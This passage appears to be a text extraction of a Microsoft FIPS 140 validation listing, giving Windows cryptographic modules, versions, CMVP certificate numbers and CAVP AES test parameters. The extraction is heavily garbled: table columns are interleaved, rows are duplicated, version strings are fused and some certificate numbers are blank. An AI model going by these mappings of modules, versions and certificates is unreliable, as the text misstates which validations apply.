#298); RNG (Cert. #321);
(Cert. #549)

Diffie-Hellman (key
agreement; key
strength); EC Diffie-Hellman
(key agreement; key
encryption strength); MD2;
MD4; MD5; RC2; RC4;
HMAC MD5
W i n d o w s X P SP 3

Policy)
Kernel Mode Cryptographic 5.1.2600.5512 997 FIPS Approved
Module (FIPS.SYS) algorithms: HMAC
#449); SHS (Cert. #785);
Triple-DES MAC (Triple-
DES Cert. #677, vendor
affirmed)
MD5; HMAC MD5
Enhanced DSS and Diffie- 5.1.2600.5507 990 FIPS Approved

Hellman Cryptographic algorithms: DSA (Cert.
Provider (DSSENH) #292); RNG (Cert. #448);
DES (Cert. #676); Triple-
DES MAC (Triple-DES
Cert. #676, vendor
affirmed)
DES40; Diffie-Hellman
(key agreement; key
establishment
between 112 and 150
bits of encryption
less than 112 bits);
MD5; RC2; RC4
Enhanced Cryptographic 5.1.2600.5507 989 FIPS Approved

Provider (RSAENH) algorithms: AES (Cert.
#781); HMAC (Cert.
#428); RNG (Cert. #447);
RSA (Cert. #371); SHS
MAC (Triple-DES Cert.
#675, vendor affirmed)
MD2; MD4; MD5;
HMAC MD5; RC2; RC4;
establishment
between 112 and 150
bits of encryption
less than 112 bits)

Policy)
DSS/Diffie-Hellman 5.1.2600.2133 240 FIPS Approved
Enhanced Cryptographic algorithms: Triple-DES
Provider (Cert. #16); DSA/SHA-1
(Cert. #29)
Other algorithms: DES
(Cert. #66); RC2; RC4;
MD5; DES40; Diffie-
Hellman (key
agreement)
Microsoft Enhanced 5.1.2600.2161 238 FIPS Approved

Cryptographic Provider algorithms: Triple-DES
(Cert. #81); AES (Cert.
#33); SHA-1 (Cert. #83);
RSA (PKCS#1, vendor
affirmed); HMAC-SHA-1
(Cert. #83, vendor
affirmed)
(Cert. #156); RC2; RC4;
MD5

Policy)
Microsoft Enhanced 5.1.2600.1029 238 FIPS Approved

Cryptographic Provider algorithms: Triple-DES
(Cert. #81); AES (Cert.
#33); SHA-1 (Cert. #83);
RSA (PKCS#1, vendor
affirmed); HMAC-SHA-1
(Cert. #83, vendor
affirmed)
(Cert. #156); RC2; RC4;
MD5
W indow s XP

Policy)

Module algorithms: Triple-DES
(Cert. #16); DSA/SHA-1
(Cert. #35); HMAC-SHA-
1 (Cert. #35, vendor
affirmed)
(Cert. #89)
W i n d o w s 2 0 0 0 SP 3
Policy)

Module (FIPS.SYS) algorithms: Triple-DES
(Cert. #16); SHA-1
(Certs. #35)
(Certs. #89)
Base DSS Cryptographic (Base DSS: 103 FIPS Approved

Provider, Base Cryptographic 5.0.2195.3665 [SP3]) algorithms: Triple-DES
Provider, DSS/Diffie-Hellman (Cert. #16); DSA/SHA-1
Enhanced Cryptographic (Base: 5.0.2195.3839 (Certs. #28 and #29);
Provider, and Enhanced [SP3]) RSA (vendor affirmed)
Cryptographic Provider (DSS/DH Enh: Other algorithms: DES
5.0.2195.3665 [SP3]) (Certs. #65, 66, 67 and
(Enh: 5.0.2195.3839 68); Diffie-Hellman (key
[SP3] agreement); RC2; RC4;
MD2; MD4; MD5
W i n d o w s 2 0 0 0 SP 2

Policy)

(Cert. #16); SHA-1
(Certs. #35)
(Certs. #89)

Provider, Base Cryptographic algorithms: Triple-DES
Provider, DSS/Diffie-Hellman 5.0.2195.2228 [SP2]) (Cert. #16); DSA/SHA-1
Enhanced Cryptographic (Base: (Certs. #28 and #29);
Provider, and Enhanced RSA (vendor affirmed)
Cryptographic Provider 5.0.2195.2228 [SP2])
(DSS/DH Enh: (Certs. #65, 66, 67 and
5.0.2195.2228 [SP2]) 68); Diffie-Hellman (key
agreement); RC2; RC4;
(Enh: MD2; MD4; MD5
5.0.2195.2228 [SP2])
W i n d o w s 2 0 0 0 SP 1

Policy)
Provider, Base Cryptographic 5.0.2150.1391 [SP1]) algorithms: Triple-DES
Provider, DSS/Diffie-Hellman (Cert. #16); DSA/SHA-1
Enhanced Cryptographic (Base: 5.0.2150.1391 (Certs. #28 and #29);
Provider, and Enhanced [SP1]) RSA (vendor affirmed)
Cryptographic Provider (DSS/DH Enh: Other algorithms: DES
5.0.2150.1391 [SP1]) (Certs. #65, 66, 67 and
(Enh: 5.0.2150.1391 68); Diffie-Hellman (key
[SP1]) agreement); RC2; RC4;
MD2; MD4; MD5
W indow s 2000

Policy)
Base DSS Cryptographic 5.0.2150.1 76 FIPS Approved

Provider, DSS/Diffie-Hellman (vendor affirmed);
Enchanced Cryptographic DSA/SHA-1 (Certs. #28
Provider, and Enhanced and 29); RSA (vendor
Cryptographic Provider affirmed)
(Certs. #65, 66, 67 and
68); RC2; RC4; MD2;
MD4; MD5; Diffie-
Hellman (key
agreement)
W in dow s 9 5 an d W in dow s 9 8

Policy)
Base DSS Cryptographic 5.0.1877.6 and 5.0.1877.7 75 FIPS Approved

Provider, DSS/Diffie-Hellman (vendor affirmed); SHA-1
Enchanced Cryptographic (Certs. #20 and 21);
Provider, and Enhanced DSA/SHA-1 (Certs. #25
Cryptographic Provider and 26); RSA (vendor-
affirmed)
(Certs. #61, 62, 63 and
64); RC2; RC4; MD2;
MD4; MD5; Diffie-
Hellman (key
agreement)
W i n d o w s N T 4 .0

Policy)
Base Cryptographic Provider 5.0.1877.6 and 5.0.1877.7 68 FIPS Approved algorithms:
SHA-1 (Certs. #20 and 21);
DSA/SHA- 1 (Certs. #25 and
26); RSA (vendor affirmed)

(Certs. #61, 62, 63 and 64);
Triple-DES (allowed for US
and Canadian Government
use); RC2; RC4; MD2; MD4;
MD5; Diffie-Hellman (key
agreement)
Windows Server
W i n d o w s Se r v e r 2 0 1 6
Validated Editions: Standard, Datacenter, Storage Server

Policy)
Cryptographic Primitives 10.0.14393 2937 FIPS Approved algorithms:

Library (bcryptprimitives.dll AES (Cert. #4064); DRBG
and ncryptsslp.dll) (Cert. #1217); DSA (Cert.
#1098); ECDSA (Cert. #911);
HMAC (Cert. #2651); KAS
(Cert. #92); KBKDF (Cert.
#101); KTS (AES Cert. #4062;
key wrapping; key
strength); PBKDF (vendor
affirmed); RSA (Certs. #2192,
#2193 and #2195); SHS
(Cert. #2227)
Other algorithms: HMAC-

MD5; MD5; DES; Legacy
CAPI KDF; MD2; MD4; RC2;
RC4; RSA (encrypt/decrypt)
Kernel Mode 10.0.14393 2936 FIPS Approved algorithms:
Cryptographic Primitives AES (Cert. #4064); DRBG
Library (cng.sys) (Cert. #1217); DSA (Cert.
#1098); ECDSA (Cert. #911);
#101); KTS (AES Cert. #4062;
key wrapping; key
strength); PBKDF (vendor
#2193 and #2195); SHS
(Cert. #2227)
Other algorithms: HMAC-

MD5; MD5; NDRNG; DES;
MD4; RC2; RC4; RSA
(encrypt/decrypt)
Boot Manager 10.0.14393 2931 FIPS Approved

#4061 and #4064);
HMAC (Cert. #2651);
PBKDF (vendor
#2193); SHS (Cert.
#3347)
PBKDF (non-compliant);
VMK KDF
BitLocker® Windows OS 10.0.14393 2932 FIPS Approved algorithms:

Loader (winload) AES (Certs. #4061 and
#4064); RSA (Cert. #2193);
SHS (Cert. #3347)
Other algorithms: NDRNG;

MD5
BitLocker® Windows 10.0.14393 2933 FIPS Approved algorithms:

Resume (winresume) AES (Certs. #4061 and
#4064); RSA (Cert. #2193);
SHS (Cert. #3347)
BitLocker® Dump Filter 10.0.14393 2934 FIPS Approved algorithms:

(dumpfve.sys) AES (Certs. #4061 and
#4064)
Code Integrity (ci.dll) 10.0.14393 2935 FIPS Approved algorithms:

#3347)
Other algorithms: AES (non-

compliant); MD5
Secure Kernel Code Integrity 10.0.14393 2938 FIPS Approved algorithms:
(skci.dll) RSA (Certs. #2193); SHS
(Certs. #3347)
W i n d o w s Se r v e r 2 0 1 2 R 2
Validated Editions: Server, Storage Server,

StorSimple 8000 Series, Azure StorSimple Virtual Array Windows Server 2012 R2

Policy)
Cryptographic Primitives 6.3.9600 6.3.9600.17031 2357 FIPS Approved algorithms:

Library (bcryptprimitives.dll AES (Cert. #2832); DRBG
and ncryptsslp.dll) (Certs. #489); DSA (Cert.
#855); ECDSA (Cert. #505);
#30); PBKDF (vendor
#1493 and #1519); SHS
(Cert. #1692)

strength); AES-GCM
encryption (non-compliant);
DES; HMAC MD5; Legacy
CAPI KDF; MD2; MD4; MD5;
(encrypt/decrypt)
Kernel Mode 6.3.9600 6.3.9600.17042 2356 FIPS Approved algorithms:

Cryptographic Primitives AES (Cert. #2832); DRBG
Library (cng.sys) (Certs. #489); ECDSA (Cert.
#505); HMAC (Cert. #1773);
#30); PBKDF (vendor
#1493 and #1519); SHS
(Cert. # 2373); Triple-DES
(Cert. #1692)

strength); AES-GCM
encryption (non-compliant);
DES; HMAC MD5; Legacy
CAPI KDF; MD2; MD4; MD5;
(encrypt/decrypt)
Boot Manager 6.3.9600 6.3.9600.17031 2351 FIPS Approved algorithms:
#1494); SHS (Certs. # 2373
and #2396)
Other algorithms: MD5; KDF

(non-compliant); PBKDF
(non-compliant)
BitLocker® Windows OS 6.3.9600 6.3.9600.17031 2352 FIPS Approved algorithms:

Loader (winload) AES (Cert. #2832); RSA (Cert.
#1494); SHS (Cert. #2396)

NDRNG
BitLocker® Windows 6.3.9600 6.3.9600.17031 2353 FIPS Approved algorithms:

Resume (winresume)[16] AES (Cert. #2832); RSA (Cert.
#1494); SHS (Certs. # 2373
and #2396)
BitLocker® Dump Filter 6.3.9600 6.3.9600.17031 2354 FIPS Approved algorithms:

(dumpfve.sys)[17] AES (Cert. #2832)
Code Integrity (ci.dll) 6.3.9600 6.3.9600.17031 2355 FIPS Approved algorithms:

# 2373)
[16] Does not apply to Azure StorSimple Virtual Array Windows Server 2012 R2
[17] Does not apply to Azure StorSimple Virtual Array Windows Server 2012 R2
Windows Server 2012
Validated Editions: Server, Storage Server

Policy)
Cryptographic Primitives 6.2.9200 1892 FIPS Approved algorithms:
(BCRYPTPRIMITIVES.DLL) #2216); DRBG (Certs. #258);
DSA (Cert. #687); ECDSA
#1345); KAS (Cert. #36);
KBKDF (Cert. #3); PBKDF
(Certs. #1133 and #1134);
(Cert. #1387)

KDF; MD2; MD4; MD5;
(encrypt/decrypt)#687);
ECDSA (Cert. ); HMAC (Cert.
#); KAS (Cert. ); KBKDF (Cert.
); PBKDF (vendor affirmed);
RSA (Certs. and ); SHS (Cert.
); Triple-DES (Cert. )

, key wrapping; key
KDF; MD2; MD4; MD5;
(encrypt/decrypt)
Kernel Mode 6.2.9200 1891 FIPS Approved algorithms:
Cryptographic Primitives AES (Certs. #2197 and
Library (cng.sys) #2216); DRBG (Certs. #258
and #259); ECDSA (Cert.
#341); HMAC (Cert. #1345);
#3); PBKDF (vendor
affirmed); RNG (Cert. #1110);
RSA (Certs. #1133 and
#1134); SHS (Cert. #1903);

KDF; MD2; MD4; MD5;
(encrypt/decrypt)#1110);
RSA (Certs. and ); SHS (Cert.
); Triple-DES (Cert. )

, key wrapping; key
KDF; MD2; MD4; MD5;
(encrypt/decrypt)
Boot Manager 6.2.9200 1895 FIPS Approved algorithms:

#2198); HMAC (Cert.
#1347); RSA (Cert. #1132);
SHS (Cert. #1903)
BitLocker® Windows OS 6.2.9200 1896 FIPS Approved algorithms:

Loader (WINLOAD) AES (Certs. #2196 and
#2198); RSA (Cert. #1132);
SHS (Cert. #1903)

#2197; non-compliant);
MD5; Non-Approved RNG
BitLocker® Windows 6.2.9200 1898 FIPS Approved algorithms:

Resume (WINRESUME) AES (Certs. #2196 and
#2198); RSA (Cert. #1132);
SHS (Cert. #1903)

BitLocker® Dump Filter 6.2.9200 1899 FIPS Approved algorithms:
(DUMPFVE.SYS) AES (Certs. #2196 and
#2198)
Code Integrity (CI.DLL) 6.2.9200 1897 FIPS Approved algorithms:

#1903)
Enhanced DSS and Diffie- 6.2.9200 1893 FIPS Approved algorithms:

Hellman Cryptographic DSA (Cert. #686); SHS (Cert.
Provider (DSSENH.DLL) #1902); Triple-DES (Cert.
#1386); Triple-DES MAC
(Triple-DES Cert. #1386,
vendor affirmed)

key establishment
Enhanced Cryptographic 6.2.9200 1894 FIPS Approved algorithms:

Provider (RSAENH.DLL) AES (Cert. #2196); HMAC
(Cert. #1346); RSA (Cert.
#1132); SHS (Cert. #1902);

strength); DES; MD2; MD4;
MD5; RC2; RC4; RSA (key
of encryption strength);
Triple-DES (Cert. #1386, key
W i n d o w s Se r v e r 2 0 0 8 R 2

Policy)
Boot Manager (bootmgr) 6.1.7600.16385 or 1321 FIPS Approved algorithms:
6.1.7601.175146.1.7600.16 AES (Certs. #1168 and
385 or 6.1.7601.17514 #1177); HMAC (Cert. #675);
#1081)

(winload.exe) 6.1.7600.16757, AES (Certs. #1168 and
6.1.7600.20897, #1177); RSA (Cert. #568);
6.1.7600.20916, SHS (Cert. #1081)
6.1.7601.17514,
6.1.7601.17556, Other algorithms: MD5
6.1.7601.21655 and
6.1.7601.216756.1.7600.16
385, 6.1.7600.16757,
6.1.7600.20897,
6.1.7600.20916,
6.1.7601.17514,
6.1.7601.17556,
6.1.7601.21655 and
6.1.7601.21675
Code Integrity (ci.dll) 6.1.7600.16385, 1334 FIPS Approved algorithms:

6.1.7600.17122, RSA (Cert. #568); SHS (Cert.
6.1.7600.21320, #1081)
6.1.7601.17514,
6.1.7601.17950 and Other algorithms: MD5
6.1.7601.221086.1.7600.16
385, 6.1.7600.17122,
6.1.7600.21320,
6.1.7601.17514,
6.1.7601.17950 and
6.1.7601.22108
Kernel Mode Cryptographic 6.1.7600.16385, 1335 FIPS Approved algorithms:
Primitives Library (cng.sys) 6.1.7600.16915, AES (Certs. #1168 and
6.1.7600.21092, #1177); AES GCM (Cert.
6.1.7601.17514, #1168, vendor-affirmed);
6.1.7601.17919, AES GMAC (Cert. #1168,
6.1.7601.17725, vendor-affirmed); DRBG
6.1.7601.21861 and (Certs. #23 and #27); ECDSA
6.1.7601.220766.1.7600.16 (Cert. #142); HMAC (Cert.
385, 6.1.7600.16915, #686); KAS (SP 800-56A,
6.1.7600.21092, vendor affirmed, key
6.1.7601.17514, agreement; key
6.1.7601.17919, establishment methodology
6.1.7601.17725, provides between 80 and
6.1.7601.21861 and 256 bits of encryption
6.1.7601.22076 strength); RNG (Cert. #649);
(Cert. #846)
-Other algorithms: AES

key establishment
encryption strength); DES;
Diffie-Hellman (key
agreement; key
HMAC MD5; RC2; RC4
Cryptographic Primitives 66.1.7600.16385 or 1336 FIPS Approved algorithms:

Library (bcryptprimitives.dll) 6.1.7601.1751466.1.7600.1 AES (Certs. #1168 and
6385 or 6.1.7601.17514 #1177); AES GCM (Cert.
#1168, vendor-affirmed);
vendor-affirmed); DRBG
(Certs. #23 and #27); DSA
(Cert. #391); ECDSA (Cert.
#142); HMAC (Cert. #686);
KAS (SP 800-56A, vendor
affirmed, key agreement; key
strength); RNG (Cert. #649);
(Cert. #846)

strength); DES; HMAC MD5;
MD2; MD4; MD5; RC2; RC4
Provider (RSAENH) AES (Cert. #1168); DRBG
#687); SHS (Cert. #1081);

strength)

Hellman Cryptographic DSA (Cert. #390); RNG (Cert.
Provider (DSSENH) #649); SHS (Cert. #1081);

RC2 MAC; RC4
BitLocker™ Drive Encryption 6.1.7600.16385, 1339 FIPS Approved algorithms:

6.1.7600.16429, AES (Certs. #1168 and
6.1.7600.16757, #1177); HMAC (Cert. #675);
6.1.7600.20536, SHS (Cert. #1081)
6.1.7600.20873,
6.1.7600.20897, Other algorithms: Elephant
6.1.7600.20916, Diffuser
6.1.7601.17514,
6.1.7601.17556,
6.1.7601.21634,
6.1.7601.21655 or
6.1.7601.216756.1.7600.16
385, 6.1.7600.16429,
6.1.7600.16757,
6.1.7600.20536,
6.1.7600.20873,
6.1.7600.20897,
6.1.7600.20916,
6.1.7601.17514,
6.1.7601.17556,
6.1.7601.21634,
6.1.7601.21655 or
6.1.7601.21675

Policy)
Boot Manager (bootmgr) 6.0.6001.18000, 1004 FIPS Approved algorithms:
6.0.6002.18005 and AES (Certs. #739 and #760);
6.0.6002.224976.0.6001.18 HMAC (Cert. #415); RSA
000, 6.0.6002.18005 and (Cert. #355); SHS (Cert.
6.0.6002.22497 #753)

(winload.exe) 6.0.6001.18606, AES (Certs. #739 and #760);
6.0.6001.22861, RSA (Cert. #355); SHS (Cert.
6.0.6002.18005, #753)
6.0.6002.18411,
6.0.6002.22497 and Other algorithms: MD5
6.0.6002.225966.0.6001.18
000, 6.0.6001.18606,
6.0.6001.22861,
6.0.6002.18005,
6.0.6002.18411,
6.0.6002.22497 and
6.0.6002.22596
Code Integrity (ci.dll) 6.0.6001.18000 and 1006 FIPS Approved algorithms:

6.0.6002.180056.0.6001.18 RSA (Cert. #355); SHS (Cert.
000 and 6.0.6002.18005 #753)
Kernel Mode Security 6.0.6001.18709, 1007 FIPS Approved algorithms:

Support Provider Interface 6.0.6001.18272, AES (Certs. #739 and #757);
(ksecdd.sys) 6.0.6001.18796, ECDSA (Cert. #83); HMAC
6.0.6001.22202, (Cert. #413); RNG (Cert.
6.0.6001.22450, #435 and SP800-90 AES-
6.0.6001.22987, CTR, vendor affirmed); RSA
6.0.6001.23069, (Certs. #353 and #358); SHS
6.0.6002.18005, (Cert. #753); Triple-DES
6.0.6002.18051, (Cert. #656)
6.0.6002.18541,
6.0.6002.18643, Other algorithms: AES (GCM
6.0.6002.22152, and GMAC; non-compliant);
6.0.6002.22742 and DES; Diffie-Hellman (key
6.0.6002.228696.0.6001.18 agreement; key
709, 6.0.6001.18272, establishment methodology
6.0.6001.22202, 150 bits of encryption
6.0.6001.22450, strength; non-compliant less
6.0.6001.22987, than 112 bits of encryption
6.0.6001.23069, strength); EC Diffie-Hellman
6.0.6002.18005, (key agreement; key
6.0.6002.18051, establishment methodology
6.0.6002.18643, 256 bits of encryption
6.0.6002.22152, strength); MD2; MD4; MD5;
6.0.6002.22742 and HMAC MD5; RC2; RC4; RNG
6.0.6002.22869 (SP 800-90 Dual-EC; non-
wrapping: key establishment
of encryption strength)#83);
HMAC (Cert. ); RNG (Cert.
and SP800-90 AES-CTR,
vendor affirmed); RSA (Certs.
and ); SHS (Cert. ); Triple-DES
(Cert. )
Other algorithms: AES (GCM

and GMAC; non-compliant);
DES; Diffie-Hellman (key
agreement; key
(key agreement; key
HMAC MD5; RC2; RC4; RNG
(SP 800-90 Dual-EC; non-
wrapping: key establishment
Cryptographic Primitives 6.0.6001.22202, 1008 FIPS Approved algorithms:

Library (bcrypt.dll) 6.0.6002.18005 and AES (Certs. #739 and #757);
6.0.6002.228726.0.6001.22 DSA (Cert. #284); ECDSA
202, 6.0.6002.18005 and (Cert. #83); HMAC (Cert.
6.0.6002.22872 #413); RNG (Cert. #435 and
SP800-90, vendor affirmed);
(Cert. #656)
Other algorithms: AES (GCM

and GMAC; non-compliant);
DES; Diffie-Hellman (key
agreement; key
(key agreement; key
RC2; RC4; RNG (SP 800-90
Dual-EC; non-compliant);
provides less than 112 bits
Enhanced DSS and Diffie- 6.0.6001.18000 and 1009 FIPS Approved algorithms:
Hellman Cryptographic 6.0.6002.180056.0.6001.18 DSA (Cert. #282); RNG (Cert.
Provider (DSSENH) 000 and 6.0.6002.18005 #435); SHS (Cert. #753);
-Other algorithms: DES; DES

Diffie-Hellman (key
agreement; key
strength); MD5; RC2; RC2
MAC; RC4
Enhanced Cryptographic 6.0.6001.22202 and 1010 FIPS Approved algorithms:

Provider (RSAENH) 6.0.6002.180056.0.6001.22 AES (Cert. #739); HMAC
202 and 6.0.6002.18005 (Cert. #408); RNG (SP 800-
90, vendor affirmed); RSA
(Certs. #353 and #355); SHS
(Cert. #656)

strength)
W i n d o w s Se r v e r 2 0 0 3 SP 2

Policy)

Hellman Cryptographic algorithms: DSA (Cert.
Provider (DSSENH) #221); RNG (Cert. #314);
(Cert. #543)
DES40; Diffie-Hellman
(key agreement; key
establishment
between 112 and 150
bits of encryption
encryption strength);
MD5; RC2; RC4
Module (FIPS.SYS) algorithms: HMAC
#313); SHS (Cert. #610);
HMAC-MD5

Provider (RSAENH) algorithms: AES (Cert.
#548); HMAC (Cert.
#289); RNG (Cert. #316);
(Cert. #544)
RC2; RC4; MD2; MD4;
MD5; RSA (key
wrapping; key
establishment
between 112 and 256
bits of encryption
W i n d o w s Se r v e r 2 0 0 3 SP 1

Policy)
Kernel Mode Cryptographic 5.2.3790.1830 [SP1] 405 FIPS Approved

(Certs. #201[1] and
#370[1]); SHS (Certs.
#177[1] and #371[2])
(Cert. #230[1]); HMAC-
MD5; HMAC-SHA-1
(non-compliant)
[1] x86
[2] SP1 x86, x64, IA64
Enhanced Cryptographic 5.2.3790.1830 [Service Pack 382 FIPS Approved
Provider (RSAENH) 1]) algorithms: Triple-DES
(Cert. #192[1] and
#365[2]); AES (Certs.
#80[1] and #290[2]);
SHS (Cert. #176[1] and
#364[2]); HMAC (Cert.
#176, vendor affirmed[1]
and #99[2]); RSA
(PKCS#1, vendor
affirmed[1] and #81[2])
(Cert. #226[1]); SHA-
256[1]; SHA-384[1];
SHA-512[1]; RC2; RC4;
MD2; MD4; MD5
[1] x86
[2] SP1 x86, x64, IA64
Enhanced DSS and Diffie- 5.2.3790.1830 [Service Pack 381 FIPS Approved
Hellman Cryptographic 1] algorithms: Triple-DES
Provider (DSSENH) (Certs. #199[1] and
#381[2]); SHA-1 (Certs.
#181[1] and #385[2]);
DSA (Certs. #95[1] and
#146[2]); RSA (Cert. #81)
(Cert. #229[1]); Diffie-
Hellman (key
MD5; DES 40
[1] x86
[2] SP1 x86, x64, IA64

Policy)

(Certs. #201[1] and
#370[1]); SHS (Certs.
#177[1] and #371[2])
(Cert. #230[1]); HMAC-
MD5; HMAC-SHA-1
(non-compliant)
[1] x86
[2] SP1 x86, x64, IA64
Provider (RSAENH) algorithms: Triple-DES
(Cert. #192[1] and
#365[2]); AES (Certs.
#80[1] and #290[2]);
SHS (Cert. #176[1] and
#364[2]); HMAC (Cert.
#176, vendor affirmed[1]
and #99[2]); RSA
(PKCS#1, vendor
affirmed[1] and #81[2])
(Cert. #226[1]); SHA-
256[1]; SHA-384[1];
SHA-512[1]; RC2; RC4;
MD2; MD4; MD5
[1] x86
[2] SP1 x86, x64, IA64

Hellman Cryptographic algorithms: Triple-DES
Provider (DSSENH) (Certs. #199[1] and
#381[2]); SHA-1 (Certs.
#181[1] and #385[2]);
DSA (Certs. #95[1] and
#146[2]); RSA (Cert. #81)
(Cert. #229[1]); Diffie-
Hellman (key
MD5; DES 40
[1] x86
[2] SP1 x86, x64, IA64
Other Products
W i n d o w s Em b e d d e d C o m p a c t 7 a n d W i n d o w s Em b e d d e d C o m p a c t 8

Policy)
Enhanced Cryptographic 7.00.2872 [1] and 8.00.6246 2957 FIPS Approved

Provider [2] algorithms: AES
(Certs.#4433and#4434);
CKG (vendor affirmed);
DRBG
(Certs.#1432and#1433);
HMAC
(Certs.#2946and#2945);
RSA
(Certs.#2414and#2415);
SHS
(Certs.#3651and#3652);
Triple-DES
(Certs.#2383and#2384)
Allowed algorithms:
HMAC-MD5; MD5;
NDRNG
Cryptographic Primitives 7.00.2872 [1] and 8.00.6246 2956 FIPS Approved
Library (bcrypt.dll) [2] algorithms: AES
(Certs.#4430and#4431);
CKG (vendor affirmed);
CVL
(Certs.#1139and#1140);
DRBG
(Certs.#1429and#1430);
DSA
(Certs.#1187and#1188);
ECDSA
(Certs.#1072and#1073);
HMAC
(Certs.#2942and#2943);
KAS
(Certs.#114and#115);
RSA
(Certs.#2411and#2412);
SHS
(Certs.#3648and#3649);
Triple-DES
(Certs.#2381and#2382)
Allowed algorithms:
MD5; NDRNG; RSA (key
wrapping; key
establishment
between 112 and 150
bits of encryption
strength
W i n d o w s C E 6 .0 a n d W i n d o w s Em b e d d e d C o m p a c t 7

Policy)
Enhanced Cryptographic 6.00.1937 [1] and 7.00.1687 825 FIPS Approved

Provider [2] algorithms: AES (Certs.
#516 [1] and #2024 [2]);
HMAC (Certs. #267 [1]
and #1227 [2]); RNG
(Certs. #292 [1] and
#1060 [2]); RSA (Cert.
#230 [1] and #1052 [2]);
SHS (Certs. #589 [1] and
#1774 [2]); Triple-DES
(Certs. #526 [1] and
#1308 [2])
HMAC-MD5; RC2; RC4;
DES
O u t l o o k Cr ypt o gr aph i c Pr o vi der

Policy)
Outlook Cryptographic SR-1A (3821)SR-1A (3821) 110 FIPS Approved
Provider (EXCHCSP) algorithms: Triple-DES
(Cert. #18); SHA-1
(Certs. #32); RSA
(vendor affirmed)
(Certs. #91); DES MAC;
RC2; MD2; MD5
Cryptographic Algorithms
The following tables are organized by cryptographic algorithms with their modes, states, and key sizes. For each
algorithm implementation (operating system / platform), there is a link to the Cryptographic Algorithm Validation
Program (CAVP ) issued certificate.
Advanced Encryption Standard (AES )
Modes / States / Key Sizes Algorithm Implementation and Certificate #
AES-CBC: Microsoft Surface Hub Virtual TPM Implementations

Modes: Decrypt, Encrypt #4904
Key Lengths: 128, 192, 256 (bits)
Version 10.0.15063.674
AES-CFB128:
Modes: Decrypt, Encrypt
AES-CTR:
Counter Source: Internal
AES-OFB:
AES-CBC: Windows 10 Home, Pro, Enterprise, Education, Windows

Modes: Decrypt, Encrypt 10 S Fall Creators Update and Windows Server, Windows
Key Lengths: 128, 192, 256 (bits) Server Datacenter (version 1709); Virtual TPM
AES-CFB128: Implementations #4903
Modes: Decrypt, Encrypt Version 10.0.16299
AES-CTR:
AES-OFB:
AES-CBC: Microsoft Surface Hub SymCrypt Cryptographic

Modes: Decrypt, Encrypt Implementations #4902
Version 10.0.15063.674
AES-CCM:
Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits)
IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits)
Plain Text Length: 0-32
AAD Length: 0-65536
AES-CFB128:
AES-CFB8:
AES-CMAC:
Generation:
AES-128:
Block Sizes: Full, Partial
Message Length: 0-65536
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
Verification:
AES-128:
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
AES-CTR:
AES-ECB:
AES-GCM:
Tag Lengths: 96, 104, 112, 120, 128 (bits)
Plain Text Lengths: 0, 8, 1016, 1024 (bits)
AAD Lengths: 0, 8, 1016, 1024 (bits)
96 bit IV supported
AES-XTS:
Key Size: 128:
Block Sizes: Full
Key Size: 256:
Block Sizes: Full
AES-CBC: Windows 10 Mobile (version 1709) SymCrypt

Modes: Decrypt, Encrypt Cryptographic Implementations #4901
Version 10.0.15254
AES-CCM:
Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits)
IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits)
AAD Length: 0-65536
AES-CFB128:
AES-CFB8:
AES-CMAC:
Generation:
AES-128:
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
Verification:
AES-128:
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
AES-CTR:
AES-ECB:
AES-GCM:
Tag Lengths: 96, 104, 112, 120, 128 (bits)
AAD Lengths: 0, 8, 1016, 1024 (bits)
96 bit IV supported
AES-XTS:
Key Size: 128:
Block Sizes: Full
Key Size: 256:
Block Sizes: Full
AES-CBC: Windows 10 Home, Pro, Enterprise, Education, Windows

Key Lengths: 128, 192, 256 (bits) Server Datacenter (version 1709); SymCrypt
AES-CCM: Cryptographic Implementations #4897
Key Lengths: 128, 192, 256 (bits) Version 10.0.16299
Tag Lengths: 32, 48, 64, 80, 96, 112, 128 (bits)
IV Lengths: 56, 64, 72, 80, 88, 96, 104 (bits)
AAD Length: 0-65536
AES-CFB128:
AES-CFB8:
AES-CMAC:
Generation:
AES-128:
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
Verification:
AES-128:
Tag Length: 16-16
AES-192:
Tag Length: 16-16
AES-256:
Tag Length: 16-16
AES-CTR:
AES-ECB:
AES-GCM:
IV Generation: External
Tag Lengths: 96, 104, 112, 120, 128 (bits)
AAD Lengths: 0, 8, 1016, 1024 (bits)
96 bit IV supported
AES-XTS:
Key Size: 128:
Block Sizes: Full
Key Size: 256:
Block Sizes: Full
AES-KW: Microsoft Surface Hub Cryptography Next Generation

(CNG) Implementations #4900
CIPHK transformation direction: Forward Version 10.0.15063.674
Plain Text Lengths: 128, 192, 256, 320, 2048 (bits)
AES Val#4902
AES-KW: Windows 10 Mobile (version 1709) Cryptography Next

Generation (CNG) Implementations #4899
CIPHK transformation direction: Forward Version 10.0.15254
Plain Text Lengths: 128, 192, 256, 320, 2048 (bits)
AES Val#4901
AES-KW: Windows 10 Home, Pro, Enterprise, Education, Windows

10 S Fall Creators Update and Windows Server, Windows
Modes: Decrypt, Encrypt Server Datacenter (version 1709); Cryptography Next
CIPHK transformation direction: Forward Generation (CNG) Implementations #4898
Plain Text Lengths: 128, 192, 256, 320, 2048 (bits) Version 10.0.16299
AES Val#4897
AES-CCM: Microsoft Surface Hub BitLocker(R) Cryptographic

Implementations #4896
Key Lengths: 256 (bits)
Tag Lengths: 128 (bits) Version 10.0.15063.674
IV Lengths: 96 (bits)
AAD Length: 0-65536
AES Val#4902
AES-CCM: Windows 10 Mobile (version 1709) BitLocker(R)

Cryptographic Implementations #4895
Key Lengths: 256 (bits)
Tag Lengths: 128 (bits) Version 10.0.15254
AAD Length: 0-65536
AES Val#4901
AES-CCM: Windows 10 Home, Pro, Enterprise, Education, Windows
Key Lengths: 256 (bits) Server Datacenter (version 1709); BitLocker(R)
Tag Lengths: 128 (bits) Cryptographic Implementations #4894
Plain Text Length: 0-32 Version 10.0.16299
AAD Length: 0-65536
AES Val#4897
CBC ( e/d; 128 , 192 , 256 ); Windows 10 Creators Update (version 1703) Pro,
Enterprise, Education Virtual TPM Implementations #4627
CFB128 ( e/d; 128 , 192 , 256 );
Version 10.0.15063
